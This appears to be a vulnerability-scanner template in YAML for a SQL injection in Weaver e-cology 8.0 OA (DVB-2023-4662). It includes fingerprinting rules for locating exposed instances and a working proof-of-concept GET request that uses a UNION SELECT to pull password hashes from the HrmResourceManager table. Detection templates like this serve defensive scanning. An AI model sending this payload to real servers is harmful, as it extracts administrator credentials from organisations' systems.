Name: 泛微OA 前台任意SQL语句执行
  Description: 泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。
  Identifier:
    DVB: DVB-2023-4662
  VulnClass:
  - SQL注入
  Category:
  - 应用服务
  Manufacturer: 泛微网络
  Product: 泛微e-cology8.0
  Type: 1
  Status: 1
  Scanable: 1
  Level: 3
  DisclosureDate: '2023-06-12'
  Is0day: false
  IncludeExp: false
  Weakable: false
  IsXc: true
  IsCommon: false
  IsCallBack: false
  Condition: body="/js/ecology8" || body="wui/common/css/w7OVFont_wev8.css" || (body="weaver"
    && body="ecology") || (header="ecology_JSessionId" && body="login/Login.jsp")
    || body="/wui/index.html" || body="jquery_wev8"
  Solutions:
  - 请关注厂商的修复版本，并及时更新到最新版本.
poc:
  relative: req0
  session: false
  requests:
  - method: GET
    timeout: 10
    path: /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
        Gecko) Chrome/62.0.2426.8 Safari/537.36
    follow_redirects: true
    matches: (code.eq("200") && body.regex("[0-9A-F]{32}"))